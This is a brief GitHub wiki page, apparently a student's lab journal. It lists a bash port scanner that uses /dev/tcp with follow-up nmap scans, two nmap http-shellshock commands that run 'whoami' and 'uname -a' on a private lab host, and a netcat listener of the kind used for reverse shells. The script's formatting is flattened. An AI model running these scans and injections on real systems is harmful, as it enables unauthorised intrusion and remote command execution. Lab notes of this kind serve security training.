Various Codes I have used - 5huckle/OFFICIALTECHJOURNAL GitHub Wiki
Use Edit view to see intact code
#!/bin/bash hostfile=$1 portfile=$2 echo "host,port" for host in $(cat
$hostfile); do for port in $ (cat $portfile); do timeout .1 bash -c "echo >/dev/tcp/$host/$port" 2>/dev/null && echo "$host,$port" && sudo nmap -A -sV $host -p $port done done
#My addition is the nmap scan on line 9. The -A and -sV provide additional information about the targets, while the -p allows a range of ports
sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /usr/bin/whoami" 10.0.5.23
sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /bin/uname -a" 10.0.5.23
nc -nlvp